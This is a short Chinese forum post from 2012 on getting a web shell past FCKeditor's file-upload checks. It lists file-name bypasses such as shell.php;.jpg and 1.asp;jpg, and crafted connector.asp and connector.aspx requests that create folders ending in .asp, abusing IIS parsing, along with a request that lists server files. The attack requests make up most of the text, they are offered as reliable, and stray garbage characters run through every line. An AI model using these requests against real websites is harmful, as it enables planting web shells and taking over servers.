很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg% ~: `8 N8 N8 D4 @$ q: N- F
3 e& Z7 C% r) \1 v4 f
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。- n, N% E; O' k* }) `( {! b
% K/ h) Q R( o' m% l( \继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。9 p& t$ Z( K9 Y% R, u W0 w
( X& k8 K* H7 { C8 D, R6 C2 h) n
突破建立文件夹:% g) W' B; ?2 k, w
# r$ ]( Y; ]; j: I+ Peditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp2 o2 g+ S, l0 a/ _8 `, ^& C( {
2 ~3 z+ }* z# J n) D* {$ B& `* A
参数:/ |& f C* |: ^' O
K- F: m. L, I: L/ z, o
当前目录名:CurrentFolder=/qing.asp# h6 X" @: j* l* X
( F; Z6 V" Z1 z+ I M \, a
新的目录名:NewFolderName=x.asp
7 Z3 z, ], }& X0 H, c& F" {* Q& j! D5 s7 a! d; t3 S
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
% u; ]. L" e, d7 a
6 g6 i" C8 H4 e( f; F" ?那么 x.asp 就已经建立生成了,此方法百试百灵!
1 w% w2 n# v, ~0 |: }, F4 Y! k) U+ u9 p: M
新建文件夹参数 x.asp,基本都能搞定。
- x; Q* a7 u r! s3 }. s( B8 ^) z7 Q: ~3 w1 E7 V, b. r6 E/ ?/ `0 r& \
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
" g( O) y" g& N! I7 x6 `" U @& j; ]$ c7 @* z) X, x# J
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
3 r, E ?5 s" v% B
. `+ E# f* v$ r, G3 K获取文件列表/ _/ R, D, Z) \7 f8 y6 Q- [. X" B
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
0 _) C1 _: D4 o9 [: b. v
5 p8 M# E5 H4 R) a7 g4 u |
发表于 2012-12-31 09:27:09
收藏
支持
反对